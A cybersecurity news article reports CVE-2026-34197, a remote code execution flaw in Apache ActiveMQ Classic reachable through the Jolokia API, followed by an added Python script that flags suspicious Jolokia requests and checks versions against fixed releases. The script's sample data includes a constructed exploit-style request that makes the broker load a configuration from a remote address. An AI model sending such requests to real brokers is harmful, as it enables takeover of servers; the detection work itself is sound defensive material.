xiand.ai
Apr 9, 2026 · Updated 11:47 AM UTC
Cybersecurity

Critical Remote Code Execution Vulnerability in Apache ActiveMQ Has Persisted for 13 Years

Researchers have uncovered a remote code execution (RCE) vulnerability, CVE-2026-34197, in Apache ActiveMQ Classic, which allows attackers to bypass restrictions via the Jolokia API to execute arbitrary system commands.

Ryan Torres


Cybersecurity firm Horizon3.ai has disclosed a remote code execution (RCE) vulnerability, tracked as CVE-2026-34197, affecting the open-source message broker Apache ActiveMQ Classic. The vulnerability has remained hidden within the software for 13 years, potentially impacting a wide range of organizations across the financial, healthcare, and government sectors.

At the heart of the issue is ActiveMQ’s built-in Jolokia API. Designed as a bridge between HTTP and JMX, Jolokia is intended to provide remote management capabilities. Researcher Naveen Sunkavally explained that attackers can exploit this by invoking the 'addNetworkConnector' operation within the Jolokia API, forcing the broker to fetch and execute an external Spring XML configuration file, which leads to remote code execution.

Root Cause and Exploitation

ActiveMQ’s configuration allows for inter-broker connections via URIs. The vulnerability is triggered through the 'vm://' transport protocol, which was originally intended for embedding brokers within a single JVM. By crafting a specific URI and passing it as a parameter, an attacker can force ActiveMQ to instantiate a non-existent broker and load a configuration file from a remote URL of the attacker's choosing.

Horizon3.ai’s analysis indicates that while earlier security patches restricted Jolokia’s access to dangerous MBeans, the overly permissive default access controls on ActiveMQ’s own MBeans allow attackers to bypass these protections. In certain versions (6.0.0 through 6.1.1), the lack of authentication—stemming from the previously identified CVE-2024-32114—means that attackers can execute the exploit without needing any login credentials at all.

The barrier to entry for this exploit is low. If a system is running with default configurations, an attacker can take control of the server with a simple HTTP POST request. Even in environments where credentials are required, if administrators have failed to change the default 'admin:admin' credentials, attackers can easily gain unauthorized access.

As a critical component in distributed systems, Apache ActiveMQ has frequently been a target for malicious actors. Previous vulnerabilities, such as CVE-2016-3088 and CVE-2023-46604, have been included in the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog.

The Apache Software Foundation has released patches to address the issue. Organizations are strongly advised to upgrade their ActiveMQ instances to version 6.2.3 or 5.19.4 as soon as possible. Given the severity of the flaw and the active nature of current exploitation methods, Horizon3.ai emphasizes that enterprises should treat this update as a top security priority.
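As an added example (not from the article or Horizon3.ai), the following Python triages constructed Jolokia request records for the `addNetworkConnector` pattern described above and classifies broker version strings against the fixed releases the article names. The sample request bodies, hostnames and the `config` option name inside the sample `vm://` URI are constructed; the version check assumes every release below the fixed one in its line is unpatched.

```python
import json
import re

# Fixed releases and the no-authentication range named in the article.
FIXED = {5: (5, 19, 4), 6: (6, 2, 3)}
NOAUTH_RANGE = ((6, 0, 0), (6, 1, 1))
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def parse_version(v: str) -> tuple:
    return tuple(int(p) for p in v.split(".")[:3])

def assess_version(v: str) -> str:
    """Classify a broker version string against the article's ranges."""
    ver = parse_version(v)
    fixed = FIXED.get(ver[0])
    if fixed is None:
        return "unknown-line"
    if ver >= fixed:
        return "patched"
    if NOAUTH_RANGE[0] <= ver <= NOAUTH_RANGE[1]:
        return "vulnerable-unauthenticated"
    return "vulnerable"

def classify_request(req: dict) -> str:
    """Score one HTTP request record as 'high', 'medium' or 'none'."""
    if "jolokia" not in req.get("path", "").lower():
        return "none"
    try:
        body = json.loads(req.get("body") or "{}")
    except json.JSONDecodeError:
        return "none"
    if body.get("type") != "exec" or body.get("operation") != "addNetworkConnector":
        return "none"
    args = " ".join(str(a) for a in body.get("arguments", []))
    if args.lower().startswith("vm://") and REMOTE_URL.search(args):
        return "high"      # vm:// URI embedding a remote config URL: the article's pattern
    return "medium"        # any connector added through Jolokia deserves review

def triage(requests: list) -> list:
    """Return (index, severity) for every request that is not benign."""
    hits = []
    for i, r in enumerate(requests):
        sev = classify_request(r)
        if sev != "none":
            hits.append((i, sev))
    return hits

# Constructed sample records (not captured traffic); 'config' is a placeholder option name.
BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLES = [
    {"method": "POST", "path": "/api/jolokia/", "body": json.dumps({"type": "exec", "mbean": BROKER,
     "operation": "addNetworkConnector", "arguments": ["vm://rogue?config=http://203.0.113.5/broker.xml"]})},
    {"method": "POST", "path": "/api/jolokia/", "body": json.dumps({"type": "exec", "mbean": BROKER,
     "operation": "addNetworkConnector", "arguments": ["static:(tcp://broker2.internal:61616)"]})},
    {"method": "POST", "path": "/api/jolokia/", "body": json.dumps({"type": "read", "mbean": BROKER,
     "attribute": "TotalConsumerCount"})},
    {"method": "GET", "path": "/admin/queues.jsp", "body": ""},
]
```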
